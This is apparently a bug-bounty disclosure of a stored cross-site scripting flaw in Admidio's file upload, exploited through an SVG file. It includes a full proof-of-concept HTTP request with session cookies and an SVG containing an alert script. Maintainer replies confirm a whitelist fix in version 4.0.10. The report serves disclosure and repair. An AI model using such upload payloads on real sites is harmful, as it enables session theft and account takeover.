Cross-site Scripting (XSS) - Stored in admidio/admidio

Valid

Reported on

Oct 8th 2021


Description

Stored XSS via uploading a .svg file allows arbitrary execution of JavaScript

Proof of Concept

// PoC.req
POST /demo_en/adm_program/system/file_upload.php?module=documents_files&mode=upload_files&id=1 HTTP/2
Host: www.admidio.org
Cookie: ADMIDIO_DEMO_d00c3e23_demo_en_SESSION_ID=0ee35dd07ba4a64727e8c9a3463c66d6; ADMIDIO_ADMIDIO_admlogin_adm_SESSION_ID=7aa0730b932b697b593707e5d41805a7; _pk_id.1.d9e6=1cd59d39301bbfdc.1633690352.; _pk_ses.1.d9e6=1; __gads=ID=68d51478d1a7acbc-227a19c950cc00b9:T=1633690355:RT=1633690355:S=ALNI_MbmgpMba4eYhn7CGTCqPzYrO6UYWw
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------325519286641775463042068650248
Content-Length: 647
Origin: https://www.admidio.org
Referer: https://www.admidio.org/demo_en/adm_program/system/file_upload.php?module=documents_files&id=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

-----------------------------325519286641775463042068650248
Content-Disposition: form-data; name="files[]"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>
-----------------------------325519286641775463042068650248--

Steps to Reproduce

Create an .svg file containing the payload

Example

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>

Go to Documents & Files and choose Upload Files

The XSS will trigger when the file is viewed.

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the admidio team and are waiting to hear back 18 days ago
admidio/admidio maintainer validated this vulnerability 17 days ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Markus
11 days ago

Maintainer


We have implemented a whitelist in version 4.0.10 which is just released. Within this whitelist svg is not listed. Thanks for the hint.

Markus Faßbender confirmed that a fix has been merged on cb51a9 11 days ago
Markus Faßbender has been awarded the fix bounty